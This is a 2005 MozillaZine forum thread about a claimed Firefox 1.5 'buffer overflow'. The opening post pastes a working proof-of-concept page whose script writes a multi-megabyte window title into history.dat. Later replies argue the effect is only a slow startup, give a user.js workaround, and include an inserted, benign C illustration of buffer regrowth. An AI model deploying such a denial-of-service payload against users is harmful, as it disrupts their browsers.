MozillaZine

FireFox 1.5 Buffer overflow exploit

Discussion of bugs in Mozilla Firefox
markedmannerf
Guest
 

Post Posted December 7th, 2005, 6:15 am

This may have already been reported, but I'm going to post it here.

<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinds of URL data in its history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into its history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen every time until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
  var buffer = "";
  for (var i = 0; i < 5000; i++) {
    buffer += "A";
  }
  var buffer2 = buffer;
  for (i = 0; i < 500; i++) {
    buffer2 += buffer;
  }
  document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>

name already taken

 
Posts: 3124
Joined: February 27th, 2004, 9:54 am
Location: Utah

Post Posted December 7th, 2005, 7:36 am

You'll want to file a bug at https://bugzilla.mozilla.org/
"It burns like hygiene!"

hellene

 
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks

Post Posted December 7th, 2005, 7:41 am

I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy

scratch

 
Posts: 4942
Joined: November 6th, 2002, 1:27 am
Location: Massachusetts

Post Posted December 7th, 2005, 10:18 am

This is NOT the proper way to report a security bug.

please see http://www.mozilla.org/projects/securit ... olicy.html

mesostinky

 
Posts: 215
Joined: November 4th, 2002, 10:44 pm
Location: NJ

Post Posted December 7th, 2005, 11:31 am

Is this your source?

http://packetstormsecurity.org/0512-exp ... erflow.txt

Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out, I assume not. How kind of them.

Elfguy
 
Posts: 309
Joined: June 27th, 2005, 5:56 pm

Post Posted December 7th, 2005, 1:07 pm

It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

VIPerous

 
Posts: 120
Joined: September 20th, 2003, 5:15 am

Post Posted December 7th, 2005, 1:23 pm

Elfguy wrote: It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

And here is one of the comments from Digg:

"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."

How do YOU see where the stack is involved?

There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat.

The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins).

It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No."
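The regrowing read loop described in the comment above, as an added illustration that is not from this thread or from Firefox's own parser: a bounds-checked reader that grows its heap buffer either by doubling or by a fixed step, counting how many bytes get copied along the way. The 4096-byte starting capacity, both growth policies and the all-'A' input are constructed assumptions; the fixed-step policy shows why a multi-megabyte title can take a long time to read even though no byte ever lands outside the buffer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Cost of one read: buffer regrowths and bytes moved from old to new buffer. */
typedef struct { size_t regrowths; size_t bytes_copied; } grow_stats;

/* Copy `len` bytes of `src` into a heap buffer of initial size `cap` that, whenever
 * full, is replaced by a larger one (doubled if `doubling`, else +`step`) after copying
 * the old contents. Each store is bounds-checked: oversized input costs time, not safety. */
char *read_growing(const char *src, size_t len, size_t cap, int doubling,
                   size_t step, grow_stats *st)
{
    st->regrowths = st->bytes_copied = 0;
    size_t used = 0;
    char *buf = malloc(cap + 1);                   /* +1 for the NUL terminator */
    if (!buf) return NULL;
    for (size_t i = 0; i < len; i++) {
        if (used == cap) {                         /* full: grow first, then write */
            size_t ncap = doubling ? cap * 2 : cap + step;
            char *nbuf = malloc(ncap + 1);
            if (!nbuf) { free(buf); return NULL; }
            memcpy(nbuf, buf, used);               /* the copy the comment describes */
            free(buf);
            buf = nbuf; cap = ncap;
            st->regrowths++; st->bytes_copied += used;
        }
        buf[used++] = src[i];                      /* always within the current capacity */
    }
    buf[used] = '\0';
    return buf;
}

/* Constructed PoC stand-in: `len` bytes of 'A', assumed start capacity 4096. 0 = intact. */
int measure(size_t len, int doubling, size_t step, grow_stats *st)
{
    char *src = malloc(len), *out = NULL;
    if (src) { memset(src, 'A', len); out = read_growing(src, len, 4096, doubling, step, st); }
    int ok = out != NULL && strlen(out) == len;
    free(out); free(src);
    return ok ? 0 : -1;
}

int main(void)
{
    grow_stats d, f;                               /* 1 MiB; the PoC's string is larger */
    if (measure(1u << 20, 1, 0, &d) || measure(1u << 20, 0, 4096, &f)) return 1;
    printf("doubling: %zu regrowths, %zu bytes copied\nfixed step: %zu regrowths, %zu bytes copied\n",
           d.regrowths, d.bytes_copied, f.regrowths, f.bytes_copied);
}
```

For a 1 MiB input the fixed-step policy copies over a hundred times more data than doubling, which is the slowdown the comment describes and nothing more.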

Elfguy
 
Posts: 309
Joined: June 27th, 2005, 5:56 pm

Post Posted December 7th, 2005, 1:26 pm

It's not a "security issue" as there's no known way to exploit or run malicious code; all this does is cause Firefox to load much slower. Still, I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!

Unarmed
 
Posts: 4941
Joined: July 31st, 2003, 1:26 pm

Post Posted December 7th, 2005, 2:13 pm

One-line fix in user.js:
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.

Elfguy
 
Posts: 309
Joined: June 27th, 2005, 5:56 pm

Post Posted December 7th, 2005, 2:23 pm


hellene

 
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks

Post Posted December 8th, 2005, 2:47 pm

Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.

Spaceman-Spiff
 
Posts: 46
Joined: November 28th, 2002, 6:25 pm

Post Posted December 8th, 2005, 7:25 pm

Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858

Peng

 
Posts: 778
Joined: November 9th, 2004, 2:31 pm
Location: Central Florida

Post Posted December 8th, 2005, 7:32 pm

Spaceman-Spiff wrote: Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858


They're two different problems.
Hug Peng
(aka Matt Nordhoff)
Check out: Adblock Plus | FoxClocks | OpenBook

Vallejo
 
Posts: 104
Joined: November 12th, 2004, 6:16 am

Post Posted December 9th, 2005, 4:17 am

Thanks, Unarmed, for the workaround -- that's a lot better than having to set my history to 0 days.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6

diilbert
 
Posts: 13
Joined: May 15th, 2005, 1:20 pm

Post Posted December 9th, 2005, 6:51 am

Unarmed wrote: One-line fix in user.js:
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.


I am unable to find the user.js file.... I tried adding to the prefs.js w/o success... Any direction?

I am using XP SP2. Thanks.
